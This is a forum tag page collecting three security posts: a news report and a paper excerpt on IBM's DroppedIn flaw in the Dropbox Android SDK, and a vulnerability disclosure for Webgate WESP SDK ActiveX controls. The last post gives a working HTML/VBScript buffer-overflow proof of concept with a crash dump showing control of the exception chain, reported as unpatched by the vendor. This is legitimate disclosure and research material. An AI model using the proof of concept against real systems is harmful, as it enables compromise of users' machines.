Showing results for tags 'sdk'.

Found 3 results

  1. Security researchers at IBM have uncovered a bug in cloud storage service provider Dropbox's software development kit (SDK) that potentially leaves millions of Android users open to attack.

     Researchers at IBM's X-Force Application Security Research warned that the 'DroppedIn' flaw affects many applications using the Dropbox SDK. "It allows attackers to connect applications on mobile devices to a Dropbox account they control," explained vice president of IBM Security Caleb Barlow. "This vulnerability may affect any Android app that uses the Dropbox SDK versions 1.5.4 to 1.6.1, and can be exploited locally using malware and remotely using drive-by techniques."

     A Dropbox spokesperson told V3 the firm issued an update fixing the flaw in December 2014 and added it could only be exploited in "very specific circumstances" on devices where the main Dropbox Android app was not installed.

     Barlow said that despite the assurances, hackers could still steal data from vulnerable systems without the patch. "The vulnerability allows attackers to execute malicious code during the log-in process that allows them to access the random number, called a 'nonce', that Dropbox uses as part of the authentication process," he said. "Once the attacker has the nonce, they can enter an access token that is also used to identify a user and then upload or download files into/from the victim's vulnerable app to the attacker's Dropbox account."

     He added that to fully fix the problem, application developers will have to install the SDK patch. "There are many apps that rely on the Dropbox SDK, including Yahoo Mail, Microsoft Office Mobile, AgileBits 1Password, and several productivity, photo editing/sharing tools," he said. "Application developers that use the Android Dropbox SDK need to upgrade their version to at least 1.6.2 or above ASAP, which is where the patch for this vulnerability exists."

     The Dropbox spokesperson moved to allay these concerns, telling V3 "most Android app developers using our SDK have updated their apps so users don't need to do anything."

     The news follows reports that application developers are failing to install critical security updates. Researchers at McAfee reported in February that a number of "popular" applications still do not include critical patches for the high-profile BERserk and Heartbleed Secure Sockets Layer flaws.

     Source
  2. 1 Introduction

     The Dropbox SDK is a library that developers can download and add to their products. This library provides easy access to Dropbox features, such as downloading and uploading files, via a simple set of APIs. AppBrain provides statistics as to the prevalence of the use of the Dropbox SDK on Android [1]. According to these statistics, 0.31% of all applications use the Dropbox SDK. Of the top 500 apps in the Google Play Store, 1.41% use the Dropbox SDK. Interestingly, 1.32% of total app installations and 3.93% of app installations of the top 500 apps use the Dropbox SDK, respectively. While it is not a highly prevalent library, some extremely popular Android apps that may hold sensitive information use the Dropbox SDK, including Microsoft Office Mobile with over 10,000,000 downloads¹ and AgileBits 1Password with over 100,000 downloads².

     The vulnerability that we discovered may affect any Android app that uses the Dropbox SDK versions 1.5.4-1.6.1. We examined 41 apps that use the Dropbox SDK for Android, out of which 31 apps (76%) were vulnerable to our attack (i.e. they used version 1.5.4-1.6.1). It's noteworthy that the rest of the apps were vulnerable to a much simpler attack with the same consequences, but had been fixed by Dropbox with the 1.5.4 version of the SDK which they did not care to upgrade to.

     This paper is organized as follows. Section 2 gives a background on Inter-App Communication (IAC) in Android. Section 3 shows how IAC can be exploited in general locally by malware and remotely using drive-by techniques. Section 4 describes how the Dropbox SDK for Android uses OAuth for app authorization. In section 5 we deep-dive into the vulnerability we found within the Dropbox SDK for Android OAuth code. Section 6 presents a real attack, dubbed DroppedIn, that exploits the vulnerability. In section 7, we show that the threat is real by presenting case studies. We end with section 8 that presents a mitigation for the vulnerability.

     ¹ https://play.google.com/store/apps/details?id=com.microsoft.office.officehub
     ² https://play.google.com/store/apps/details?id=com.agilebits.onepassword

     2 Inter-App Communication (IAC) in Android

     Android applications are executed in a sandbox environment. The sandbox ensures data confidentiality and integrity as no application can access sensitive information held by another application without proper privileges. For example, Android's stock browser application holds sensitive information such as cookies, cache and history which shouldn't be accessed by third-party apps. The sandbox relies on several techniques including per-package Linux user-id assignment. Thus, resources, such as files, owned by one app cannot be accessed by default by other apps.

     While sandboxing is great for security, it may diminish interoperability as apps sometimes would like to talk to each other. Going back to the browser example, the browser would want to invoke the Google Play app when a user browsed to the Google Play website. In order to support this kind of functionality, Android provides high-level Inter-App Communication (IAC) mechanisms. This communication is usually done using special messages called Intents, which hold both the payload and the target application component. Intents can be sent explicitly, where the target application component is specified, or implicitly, where the target is left unspecified and is determined by Android according to other Intent parameters such as its URI scheme, action or category.

     3 General Exploitation via Inter-App Communication

     The attack surface is greatly increased if the attacker can directly invoke application components, controlling the Intent's payload. This is the case with exported application components. Such components can be attacked locally by malware. Activities, Android application components responsible for UI screens, can also be attacked remotely using drive-by exploitation techniques as shown by [2, 3].

     In the local attack, illustrated by Figure 3.1, malware invokes the exported target application component with a malicious Intent (i.e. one that contains malicious data) by simply calling APIs such as Context.startActivity(Intent). In the case of remote drive-by exploitation, illustrated by Figure 3.2, a user is lured into browsing a malicious website. This site serves a web page that causes the browser to invoke the target activity with the malicious Intent.

     Read more: http://dl.packetstormsecurity.net/1503-exploits/exploiting-dropboxsdk-android.pdf
  3. Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge. WEBGATE Embedded Standard Protocol (WESP) SDK supports the same tools in both network DVR and network camera.

     Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, inc

     http://www.webgateinc.com/wgi/eng/#2
     http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

     Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow
     Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow
     Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow
     Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow
     Vulnerability 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
     Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow
     Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow

     CompanyName      WebgateInc
     FileDescription  WESPConfig Module
     FileVersion      1, 6, 42, 0
     InternalName     WESPConfig
     LegalCopyright   Copyright (C) 2004-2010
     OriginalFileName WESPConfig.DLL
     ProductName      WESPConfig Module
     ProductVersion   1, 6, 42, 0

     ****************** PoC for one of the above Vulnerabilities ***********

         <html>
         <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
         </object>
         <!--
         targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
         prototype  = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As String , ByVal Port As Integer , ByVal UserID As String , ByVal Password As String , ByVal extcompany As Long , ByVal authType As Long , ByVal AdditionalCode As String )"
         memberName = "ConnectEx3"
         progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
         argCount   = 8
         -->
         <script language='vbscript'>
         arg1=1
         arg2=String(1044, "A")
         arg3=1
         arg4="defaultV"
         arg5="defaultV"
         arg6=1
         arg7=1
         arg8="defaultV"
         target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8
         </script>
         </html>

     ******************************

     Stack trace for above PoC

         Exception Code: ACCESS_VIOLATION
         Disasm: 76ACD33D MOV CX,[EAX]

         Seh Chain:
         --------------------------------------------------
         1 41414141

         Called From          Returns To
         --------------------------------------------------
         msvcrt.76ACD33D      WESPPlayback.999539
         WESPPlayback.999539  41414141
         41414141             22E5E0
         22E5E0               2F712C
         2F712C               41414141
         41414141             41414141
         41414141             41414141
         41414141             41414141

         Registers:
         --------------------------------------------------
         EIP 76ACD33D
         EAX 41414141
         EBX 039E0040 -> 009DF298
         ECX E0551782
         EDX 41414141
         EDI 76AD4137 -> 8B55FF8B
         ESI 76ACD335 -> 8B55FF8B
         EBP 0022E56C -> 039E0020
         ESP 0022E56C -> 039E0020

         Block Disassembly:
         --------------------------------------------------
         76ACD333 NOP
         76ACD334 NOP
         76ACD335 MOV EDI,EDI
         76ACD337 PUSH EBP
         76ACD338 MOV EBP,ESP
         76ACD33A MOV EAX,[EBP+8]
         76ACD33D MOV CX,[EAX]        <--- CRASH
         76ACD340 INC EAX
         76ACD341 INC EAX
         76ACD342 TEST CX,CX
         76ACD345 JNZ SHORT 76ACD33D
         76ACD347 SUB EAX,[EBP+8]
         76ACD34A SAR EAX,1
         76ACD34C DEC EAX
         76ACD34D POP EBP

         ArgDump:
         --------------------------------------------------
         EBP+8  41414141
         EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
         EBP+20 00000829
         EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
         EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

         Stack Dump:
         --------------------------------------------------
         22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]
         22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]
         22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]
         22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
         22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]

     P.S. CERT tried to coordinate with the vendor for fixing the issues, but there wasn't any response from the vendor.

     Best Regards,
     Praveen Darshanam

     Source